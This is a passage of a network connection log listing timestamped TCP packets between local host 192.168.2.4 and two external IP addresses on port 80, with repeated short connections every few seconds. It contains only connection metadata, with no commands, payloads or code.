Oct 19, 2024 06:43:45.850749969 CEST	50012	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:45.855727911 CEST	80	50012	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:45.855833054 CEST	50012	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:45.857701063 CEST	50012	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:45.857701063 CEST	50012	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:45.862543106 CEST	80	50012	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:45.862642050 CEST	80	50012	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:46.960751057 CEST	80	50012	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:46.960849047 CEST	50012	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:46.960849047 CEST	50012	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:46.965742111 CEST	80	50012	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:47.250878096 CEST	50015	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:47.255811930 CEST	80	50015	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:47.257005930 CEST	50015	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:47.257234097 CEST	50015	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:47.257234097 CEST	50015	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:47.262096882 CEST	80	50015	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:47.262111902 CEST	80	50015	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:48.344830036 CEST	80	50015	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:48.349030018 CEST	50015	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:48.349107981 CEST	50015	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:48.353975058 CEST	80	50015	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:48.424591064 CEST	50016	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:48.429557085 CEST	80	50016	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:48.433029890 CEST	50016	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:48.433176041 CEST	50016	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:48.433207989 CEST	50016	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:48.438055038 CEST	80	50016	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:48.438122988 CEST	80	50016	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:49.520750999 CEST	80	50016	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:49.520870924 CEST	50016	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:49.520956993 CEST	50016	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:49.525943995 CEST	80	50016	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:49.721970081 CEST	50017	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:49.726937056 CEST	80	50017	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:49.727020979 CEST	50017	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:49.727139950 CEST	50017	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:49.727173090 CEST	50017	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:49.731945038 CEST	80	50017	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:49.732050896 CEST	80	50017	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:50.849469900 CEST	80	50017	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:50.849582911 CEST	50017	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:50.849636078 CEST	50017	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:50.854505062 CEST	80	50017	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:51.031574011 CEST	50018	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:51.037013054 CEST	80	50018	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:51.037092924 CEST	50018	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:51.037252903 CEST	50018	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:51.037280083 CEST	50018	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:51.042521000 CEST	80	50018	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:51.042537928 CEST	80	50018	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:52.110703945 CEST	80	50018	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:52.112051010 CEST	50018	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:52.112152100 CEST	50018	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:52.117105007 CEST	80	50018	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:52.816726923 CEST	50019	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:52.821708918 CEST	80	50019	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:52.821815968 CEST	50019	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:52.821947098 CEST	50019	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:52.823015928 CEST	50019	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:52.826947927 CEST	80	50019	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:52.827867985 CEST	80	50019	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:53.952177048 CEST	80	50019	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:53.952244997 CEST	50019	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:53.952305079 CEST	50019	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:53.957182884 CEST	80	50019	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:54.412265062 CEST	50020	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:54.417241096 CEST	80	50020	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:54.417332888 CEST	50020	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:54.417454004 CEST	50020	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:54.419017076 CEST	50020	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:54.422204018 CEST	80	50020	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:54.423758030 CEST	80	50020	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:55.523525000 CEST	80	50020	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:55.523729086 CEST	50020	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:55.523770094 CEST	50020	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:55.528590918 CEST	80	50020	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:55.953875065 CEST	50021	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:55.958820105 CEST	80	50021	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:55.958914995 CEST	50021	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:55.959076881 CEST	50021	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:55.959129095 CEST	50021	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:55.964027882 CEST	80	50021	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:55.964036942 CEST	80	50021	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:57.079065084 CEST	80	50021	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:57.079165936 CEST	50021	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:57.079245090 CEST	50021	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:57.084207058 CEST	80	50021	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:57.490047932 CEST	50022	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:57.494955063 CEST	80	50022	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:57.495136976 CEST	50022	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:57.495244980 CEST	50022	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:57.495289087 CEST	50022	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:57.499986887 CEST	80	50022	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:57.500143051 CEST	80	50022	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:58.583332062 CEST	80	50022	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:58.583451986 CEST	50022	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:58.585477114 CEST	50022	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:58.590246916 CEST	80	50022	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:58.866991997 CEST	50023	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:58.871927023 CEST	80	50023	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:58.872003078 CEST	50023	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:58.872142076 CEST	50023	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:58.872153044 CEST	50023	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:58.876857042 CEST	80	50023	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:58.877078056 CEST	80	50023	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:59.965219021 CEST	80	50023	123.213.233.131	192.168.2.4
Oct 19, 2024 06:43:59.965280056 CEST	50023	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:59.965312004 CEST	50023	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:43:59.970129967 CEST	80	50023	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:00.163891077 CEST	50024	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:00.168879032 CEST	80	50024	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:00.169087887 CEST	50024	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:00.169258118 CEST	50024	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:00.169302940 CEST	50024	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:00.174067974 CEST	80	50024	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:00.174206972 CEST	80	50024	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:01.281676054 CEST	80	50024	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:01.281771898 CEST	50024	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:01.281771898 CEST	50024	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:01.286753893 CEST	80	50024	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:06.409543991 CEST	50025	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:06.414447069 CEST	80	50025	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:06.414510012 CEST	50025	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:06.414633989 CEST	50025	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:06.414633989 CEST	50025	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:06.419445992 CEST	80	50025	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:06.419497967 CEST	80	50025	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:07.514636993 CEST	80	50025	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:07.514715910 CEST	50025	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:07.514786959 CEST	50025	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:07.519659042 CEST	80	50025	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:11.825265884 CEST	50026	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:11.830065966 CEST	80	50026	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:11.830152035 CEST	50026	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:11.830302000 CEST	50026	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:11.830326080 CEST	50026	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:11.835066080 CEST	80	50026	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:11.835083961 CEST	80	50026	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:12.945704937 CEST	80	50026	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:12.945954084 CEST	50026	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:12.945954084 CEST	50026	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:12.950871944 CEST	80	50026	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:17.791687965 CEST	50027	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:17.796751976 CEST	80	50027	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:17.796837091 CEST	50027	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:17.796960115 CEST	50027	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:17.796978951 CEST	50027	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:17.801753998 CEST	80	50027	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:17.801858902 CEST	80	50027	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:18.934892893 CEST	80	50027	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:18.935051918 CEST	50027	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:18.935137033 CEST	50027	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:18.939996958 CEST	80	50027	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:23.948446035 CEST	50028	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:23.953391075 CEST	80	50028	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:23.953454971 CEST	50028	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:23.953608990 CEST	50028	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:23.953627110 CEST	50028	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:23.958453894 CEST	80	50028	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:23.958482981 CEST	80	50028	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:25.042648077 CEST	80	50028	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:25.042915106 CEST	50028	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:25.043178082 CEST	50028	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:25.047956944 CEST	80	50028	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:29.524445057 CEST	50029	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:29.529319048 CEST	80	50029	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:29.529397011 CEST	50029	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:29.529582977 CEST	50029	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:29.529627085 CEST	50029	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:29.534497023 CEST	80	50029	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:29.534626961 CEST	80	50029	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:30.639116049 CEST	80	50029	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:30.639250040 CEST	50029	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:30.663470030 CEST	50029	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:30.668329000 CEST	80	50029	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:35.725434065 CEST	50030	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:35.730365038 CEST	80	50030	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:35.730431080 CEST	50030	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:35.730554104 CEST	50030	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:35.730586052 CEST	50030	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:35.735404968 CEST	80	50030	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:35.735547066 CEST	80	50030	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:36.825098038 CEST	80	50030	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:36.825190067 CEST	50030	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:36.825268984 CEST	50030	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:36.830105066 CEST	80	50030	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:41.920255899 CEST	50031	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:41.925215006 CEST	80	50031	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:41.925297976 CEST	50031	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:41.925421953 CEST	50031	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:41.925450087 CEST	50031	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:41.930213928 CEST	80	50031	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:41.930355072 CEST	80	50031	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:43.048300028 CEST	80	50031	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:43.048365116 CEST	50031	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:43.048397064 CEST	50031	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:43.053646088 CEST	80	50031	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:47.590974092 CEST	50032	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:47.595793009 CEST	80	50032	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:47.595860958 CEST	50032	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:47.595964909 CEST	50032	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:47.596019030 CEST	50032	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:47.600755930 CEST	80	50032	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:47.600913048 CEST	80	50032	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:48.684273005 CEST	80	50032	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:48.684366941 CEST	50032	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:48.684442997 CEST	50032	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:48.689416885 CEST	80	50032	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:53.429882050 CEST	50033	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:53.434947014 CEST	80	50033	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:53.435044050 CEST	50033	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:53.435223103 CEST	50033	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:53.435261965 CEST	50033	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:53.440068007 CEST	80	50033	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:53.440223932 CEST	80	50033	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:54.566488028 CEST	80	50033	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:54.566602945 CEST	50033	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:54.566672087 CEST	50033	80	192.168.2.4	123.213.233.131
Oct 19, 2024 06:44:54.571535110 CEST	80	50033	123.213.233.131	192.168.2.4
Oct 19, 2024 06:44:58.968638897 CEST	50034	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:44:58.973572016 CEST	80	50034	116.58.10.60	192.168.2.4
Oct 19, 2024 06:44:58.973670959 CEST	50034	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:44:58.973855972 CEST	50034	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:44:58.973910093 CEST	50034	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:44:58.978718996 CEST	80	50034	116.58.10.60	192.168.2.4
Oct 19, 2024 06:44:58.978852034 CEST	80	50034	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:00.322999001 CEST	80	50034	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:00.323081970 CEST	50034	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:00.323163986 CEST	50034	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:00.328069925 CEST	80	50034	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:05.619326115 CEST	50035	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:05.624557018 CEST	80	50035	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:05.624726057 CEST	50035	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:05.624799967 CEST	50035	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:05.624835014 CEST	50035	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:05.629607916 CEST	80	50035	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:05.629853010 CEST	80	50035	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:06.946711063 CEST	80	50035	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:06.946810007 CEST	50035	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:06.946845055 CEST	50035	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:06.951733112 CEST	80	50035	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:11.774388075 CEST	50036	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:11.779227972 CEST	80	50036	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:11.779335022 CEST	50036	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:11.779484987 CEST	50036	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:11.779517889 CEST	50036	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:11.784290075 CEST	80	50036	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:11.784306049 CEST	80	50036	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:13.109616041 CEST	80	50036	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:13.109708071 CEST	50036	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:13.109790087 CEST	50036	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:13.114765882 CEST	80	50036	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:18.422658920 CEST	50037	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:18.431857109 CEST	80	50037	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:18.431950092 CEST	50037	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:18.432126045 CEST	50037	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:18.432161093 CEST	50037	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:18.441935062 CEST	80	50037	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:18.446175098 CEST	80	50037	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:19.786210060 CEST	80	50037	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:19.786287069 CEST	50037	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:19.786952972 CEST	50037	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:19.795475006 CEST	80	50037	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:24.736581087 CEST	50038	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:24.746570110 CEST	80	50038	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:24.746635914 CEST	50038	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:24.746797085 CEST	50038	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:24.746833086 CEST	50038	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:24.756546974 CEST	80	50038	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:24.760447025 CEST	80	50038	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:26.127265930 CEST	80	50038	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:26.127377987 CEST	50038	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:26.127485037 CEST	50038	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:26.133923054 CEST	80	50038	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:31.540827036 CEST	50039	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:31.551846027 CEST	80	50039	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:31.551944017 CEST	50039	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:31.552082062 CEST	50039	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:31.552139997 CEST	50039	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:31.562463045 CEST	80	50039	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:31.562493086 CEST	80	50039	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:32.897641897 CEST	80	50039	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:32.897717953 CEST	50039	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:32.897763968 CEST	50039	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:32.905973911 CEST	80	50039	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:37.859927893 CEST	50040	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:37.867314100 CEST	80	50040	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:37.867393970 CEST	50040	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:37.867525101 CEST	50040	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:37.867558002 CEST	50040	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:37.875444889 CEST	80	50040	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:37.875475883 CEST	80	50040	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:39.218147039 CEST	80	50040	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:39.218290091 CEST	50040	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:39.218333960 CEST	50040	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:39.228147984 CEST	80	50040	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:43.991055965 CEST	50041	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:43.996644974 CEST	80	50041	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:43.996730089 CEST	50041	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:43.996870041 CEST	50041	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:43.996893883 CEST	50041	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:44.002635956 CEST	80	50041	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:44.003681898 CEST	80	50041	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:45.340089083 CEST	80	50041	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:45.340212107 CEST	50041	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:45.341804981 CEST	50041	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:45.353017092 CEST	80	50041	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:50.862325907 CEST	61684	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:50.869719028 CEST	80	61684	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:50.869800091 CEST	61684	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:50.869941950 CEST	61684	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:50.869941950 CEST	61684	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:50.877536058 CEST	80	61684	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:50.879879951 CEST	80	61684	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:52.201960087 CEST	80	61684	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:52.202083111 CEST	61684	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:52.202169895 CEST	61684	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:52.210602045 CEST	80	61684	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:57.431236982 CEST	61685	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:57.441242933 CEST	80	61685	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:57.441338062 CEST	61685	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:57.441528082 CEST	61685	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:57.441571951 CEST	61685	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:57.451409101 CEST	80	61685	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:57.456542015 CEST	80	61685	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:58.797473907 CEST	80	61685	116.58.10.60	192.168.2.4
Oct 19, 2024 06:45:58.797573090 CEST	61685	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:58.797662973 CEST	61685	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:45:58.803745985 CEST	80	61685	116.58.10.60	192.168.2.4
Oct 19, 2024 06:46:05.405811071 CEST	61686	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:46:05.412285089 CEST	80	61686	116.58.10.60	192.168.2.4
Oct 19, 2024 06:46:05.412379026 CEST	61686	80	192.168.2.4	116.58.10.60
